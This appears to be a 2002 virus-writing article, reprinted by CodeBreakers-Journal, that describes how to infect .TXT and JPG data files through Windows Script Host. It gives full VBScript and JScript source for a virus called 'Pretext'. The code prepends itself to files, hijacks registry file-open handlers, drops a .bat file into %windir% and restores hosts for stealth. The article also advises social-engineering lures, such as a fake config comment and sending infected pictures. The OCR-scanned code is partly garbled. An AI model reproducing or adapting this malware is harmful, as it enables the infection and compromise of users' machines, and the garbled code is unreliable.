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Abstract 

Executable files are, obviously, directly executable. This 
also means that code added to these files can be executed 
directly. Can the same thing be done for data files? No. 
That is why they are called data files. 

However, what can be done is to change the environment 
so that data files become executable files. Then code can 
be added to these files that can be executed directly. 
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I. First attempt 

Let us decide to infect .TXT files. We can change the 
environment to run .TXT files as executable binary files, 
by dropping an additional executable binary file and 
changing the registry to run this file instead. This file 
calls WinExec() to run the .TXT file as executable binary 
code. There is a serious problem with this method. The 
problem is that not-infected files can crash the computer 
when the text is run as binary code. 

II. Second attempt 

We must use a different type of code and a different way 
to run it. The code type is text, and the way to run it 



is as .BAT or *Script (either VBScript or JScript). If we 
think about .BAT, then we know immediately that .BAT 
is not good because it has a 64kb limit. So the answer 
is *Script. 

If we prepend a script to .TXT files, then we can change 
the environment to use the Windows Scripting Host to 
run the script and no need for additional file. What 
about clean files? They are still a problem, but now 
the problem is different. If we try to run a clean file, 
then the computer will not crash, only the clean file will 
not be displayed anymore. Only infected files can be 
displayed. Also, new files cannot be created and existing 
files cannot be altered. 

III. Third attempt 

We can solve this problem by using the additional file 
again. The additional file can be binary or .BAT or 
*Script file. That file will use the Windows Scripting 
Host to try to run the .TXT file as a script, then to display 
the file as usual. All of those problems are solved. If the 
file is infected, then our code will clean the host so it will 
display correctly. If the file is clean already, then it will 
also display correctly. The technique can be applied to 
any file type with only a few changes to the code. Only 
one problem remains: how can we prepend a script to 
any other file without causing scripting errors? 
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IV. Final attempt 

The solution to this problem is what I call "tar-script". 
:) Microsoft's scripting engines calculate the length of a 
script by using strlen() function. This means that when 
a 0 is found, no more file is examined, so if our script 
ends with a 0 then we can append anything to it and no 
errors will happen. 

Using the prepending technique is unique because even 
if our additional file is deleted, our code can still be run 
from the data files, only it requires user support. If user 
runs the file using WSH or renames the extension to the 
scripting language that we use, then we become virus 
again. Place comment on first line: 

"This is config file. Run cscript j filename,-, //e:xxx to 
configure your system" and replace xxx with "vbs" or 
"jscript", depending on the language. ;) 

But what happens if the clean file contains a viral script? 
Heh, it runs. 

Let's see the code. It requires WSH v5.1+ because we 
must specify the engine to use. First is VBScript version. 

V. Conclusions 

Now let us decide to infect JPG files instead of .TXT 
files. How to do that? Simply change the extension from 
"txt" to "jpg" then change the registry key from 'txtfile' 
to 'jpegfile'. We must also increase the size of code by 
1 byte because 'jpegfile' is 1 byte larger than 'txtfile'. 
That's all. We infect JPG files, we replicate from JPG 
files and they still display on an infected computer. Make 
dropper by renaming extension. After run, rename to 
JPG. So now you can infect people by sending a picture 
file. 
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'Pretext - roy g biv 24/06/02 

set a=createobject( "scripting . f ilesystemobj ect " ) 

b=wscript . scriptf ullname 

on error resume next 

set c=a . opentextf ile (b) 

d=c.read(996) 

set e=a . getf ile (b) 
f =c . read (e. size -996) 



c=e . attributes 
e . attributes=0 
set g=a . opentextf ile (b , 2 ) 
if err . number=0then 
g. write f 

end if 

e . attributes=c 

set c=a . getf older ("." ) 

for each e in c. files 

if boe and lease (a . getextensionname (e) 



'no dim needed for local variables 
'open host 

'read virus code. 996 is size of virus with no 
'comments or spaces 
'get our file object 
'read rest of host file 

'if you change the size of code, then you must 

'change both of these values 

' save attributes 

'remove any read-only attribute 

'open host for writing 

'restore host, is world's first full stealth 
' script virus? ; ) 

'restore attributes 

'demo version, current directory only 



'open potential victim 

'read first character 

'check for infection marker 

'read entire file 

' save attributes 

'remove any read-only attribute 

'open file for writing 

'prepend to file 

'close file (write mode) 

'restore attributes 

'close file (read mode) 



'txf'then 

'this can be changed to any extension 
'and see below for registry key to change 

err=0 

set f=a. opentextf ile (e, 1) 
if err . number=0then 
g=f . read ( 1 ) 
if go" ' "then 
h=f . readall 
i=e . attributes 
e . attributes=0 
err=0 

set j =a . opentextf ile (e , 2 ) 
if err . number=0then 

j .write d+g+h 

j . close 
end if 

e . attributes=i 
end if 
f . close 
end if 
end if 
next 

set b=createobj ect ( "wscript . shell " ) 
c= " HKLM" 

d= " \ software \c lasses \txtf ile\ she 11 \open\ command \ " 

e=b . regread (c+d) 'read current handler 

f ="pretext .bat" 
g=f+" %1" 
if eog then 

h=a . get special folder ( 0 ) 

if right (h, 1) <>"\"then 
h=h+"\" 

end if 

a . opentextf ile (h+f , 2 , 1 ). write "Ocscript %1 //e:vbs //b //nologo" +vbcr+vblf + "@" +e 

'create and write our additional file in %windir% 
'more stealth: original handler will be used to 

b. regwrite c+d,g 'display file alter registry to infect environment 
b.regwrite"HKCU"+d,g 'Windows 2000/XP look in HKCU before HKLM 

'so we alter that key, too 

end if 



' check for infected environment 
' %windir% 

'add \ if required 
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Now is JScript version. 



//Pretext - roy g biv 24/06/02 

a=new ActiveXOb j ect ( "scripting. f ilesystemob j ect 

try 

{ 

c=a . opentextf ile (b=WScript . script f ullname) 
d=c. read (944) 

e=a . getf ile (b) 

f =c . read (e.size-944) 



c=e . attributes 
e . attributes=0 
a . opentextf ile (b, 2 ) .write(f) 



e . attributes=c 



} 

catch(z) 

{ 

} 

for (c=new Enumerator (a . getf older ( " . " ) . files) ; ! c 



") 



//open host 

//read virus code. 944 is size of virus with no 
//comments or spaces 
//get our file object 
//read rest of host file 

//if you change the size of code, then you must 

//change both of these values 

//save attributes 

//remove any read-only attribute 

//open and write host 

//if VBS version is first full stealth script 
//then this is second ; ) 
//restore attributes 



{ 



e=c . item ( ) 

if (b ! =e&&a . getextensionname (e) . toLowerCase ( ) == 



atEnd () ; c . moveNext ( ) ) 

//demo version, current directory only 



"txt " ) 

//this can be changed to any extension 
//and see below for registry key to change 



try 
{ 

f=a . opentextf ile (e, 1) 
g=f .read(l) 
if (g!="/") 
try 



{ 



h=f . readall ( ) 

i=e . attributes 

e . attributes=0 

j =a . opentextf ile (e, 2) 

j . write (d+g+h) 

j . close ( ) 

e . attributes=i 



} 

catch (z) 

{ 

} 

f . close ( ) 



//open potential victim 

//read first character, keep for later 

/ /check for infection marker 



//read entire file 

//save attributes 

//remove any read-only attribute 

//open file for writing 

//prepend to file, append first character and host 
//close file (write mode) 
//restore attributes 



//close file (read mode) 



catch (z) 
{ 



b=new ActiveXObj ect ( "wscript . shell " ) 
C= " HKLM" 

d=" \\sof tware\\classes\\txtf ile\\shell\\open\\command\\ " 

e=b . regread (c+d) //read current handler 

f ="pretext .bat" 

g=f+" %1" 
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if (e!=g) //check for infected environment 

{ 

h=a . getabsolutepathname (a . get special folder ( 0 ) ) 

/ / %windir% 

if (h.charAt (h. length- 1) !="\\") 

h+="\\" //add \ if required 

a . opentextf ile (h+f , 2 , 1 ) . write ( "Ocscript %1 //etjscript //b //nologo\r\n@" +e) 

//create and write our additional file in %windir% 
//more stealth: original handler will be used 
//to display file 

b . regwrite (c+d, g) //alter registry to infect environment 
b.regwrite ( "HKCU" +d, g) //Windows 2000/XP look in HKCU before HKLM 

//so we alter that key, too 

} 

<0 here> 



5 



Copyright © 2004 and published by the CodeBreakers-Journal. Single print or electronic copies for personal use only are permitted. 
Reproduction and distribution without permission is prohibited. 



